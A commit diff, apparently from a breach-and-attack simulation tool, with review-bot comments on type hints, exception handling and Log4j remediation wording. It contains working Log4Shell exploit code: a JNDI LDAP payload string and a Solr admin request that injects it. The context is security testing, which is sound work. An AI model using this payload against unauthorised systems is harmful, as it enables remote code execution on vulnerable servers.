Agent, Island: Minor changes to Log4Shell

Add return type annotations, remove debug logging from the Solr service exploit,
and rename "Log4j" to "Log4Shell" in Island reporting
Ilija Lazoroski 2022-01-17 16:37:03 +01:00
parent 311a721880
commit 51bf553fb5
4 changed files with 7 additions and 9 deletions


@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
def _build_ldap_payload(self): def _build_ldap_payload(self) -> str:
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
def _build_command(self, path, http_path): def _build_command(self, path, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
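Review bot: The new signature `def _build_command(self, path, http_path) -> str:` annotates only the return, leaving `path` and `http_path` untyped, so the method is half-annotated after a commit whose purpose is return types. From `location=path` and the parameter names both look like `str`, but confirm against the callers before writing `def _build_command(self, path: str, http_path: str) -> str:`. Both annotated methods would also benefit from a one-line docstring, e.g. for `_build_ldap_payload`: `"""Return the JNDI lookup string that points the target at this exploiter's LDAP listener."""`. Note that the body of `_build_command` continues past the end of the hunk, and the method ending in `self._ldap_server.stop(...)` starts before it.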


@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}" url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
try: try:
logger.debug("Sending malicious SOLR log4j request")
requests.post(url, timeout=5, verify=False) # noqa DUO123 requests.post(url, timeout=5, verify=False) # noqa DUO123
logger.debug("Request sent")
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")
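Review bot: With the two debug lines gone the `try` wraps only `requests.post(url, timeout=5, verify=False)`, and the sole handler is `except requests.ReadTimeout`; a `requests.ConnectionError` (port closed between scan and exploit, connection reset) is not caught and propagates out of `trigger_exploit` unless a caller not shown here handles it. A read timeout is the expected outcome for this request, since the Solr side blocks on the JNDI lookup, so a debug-level log is reasonable, but the same best-effort treatment should apply to connection failures: `except (requests.ReadTimeout, requests.ConnectionError) as e:`. The surviving log message still reads `Log4shell request failed`, inconsistent with the "Log4Shell" spelling this commit adopts elsewhere. Whether `trigger_exploit` carries a `@staticmethod` decorator cannot be seen, as the line above the hunk is outside it.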


@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
POWERSHELL = ExploiterDescriptor( POWERSHELL = ExploiterDescriptor(
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
) )
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor) LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
@staticmethod @staticmethod
def get_by_class_name(class_name: str) -> ExploiterDescriptor: def get_by_class_name(class_name: str) -> ExploiterDescriptor:


@ -2,19 +2,19 @@ import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell'; import CollapsibleWellComponent from '../CollapsibleWell';
export function log4shellIssueOverview() { export function log4shellIssueOverview() {
return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>) return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
} }
export function log4shellIssueReport(issue) { export function log4shellIssueReport(issue) {
return ( return (
<> <>
Upgrade the log4j component to version 2.15.0 or later. Upgrade the Apache Log4j component to version 2.15.0 or later.
<CollapsibleWellComponent> <CollapsibleWellComponent>
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
className="badge badge-danger">log4shell remote code execution</span> attack. className="badge badge-danger">the Log4Shell remote code execution</span> attack.
<br/> <br/>
The attack was made possible due to an old version of log4j component. The attack was made possible due to an old version of Apache Log4j component.
</CollapsibleWellComponent> </CollapsibleWellComponent>
</> </>
); );
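Review bot: The remediation advice on the new side, `Upgrade the Apache Log4j component to version 2.15.0 or later.`, names a version that is not a complete fix: 2.15.0 closed CVE-2021-44228 but was superseded by 2.16.0 for CVE-2021-45046 and then by 2.17.x, and by the date of this commit Apache's published guidance was 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6). Because this string is what an operator acts on from the report, suggest `Upgrade the Apache Log4j component to version 2.17.1 or later (2.12.4 on the Java 7 branch, 2.3.2 on the Java 6 branch).` The wording pass could also fix the closing sentence to `The attack was made possible due to an old version of the Apache Log4j component.`. `log4shellIssueReport` closes after the last line of this hunk.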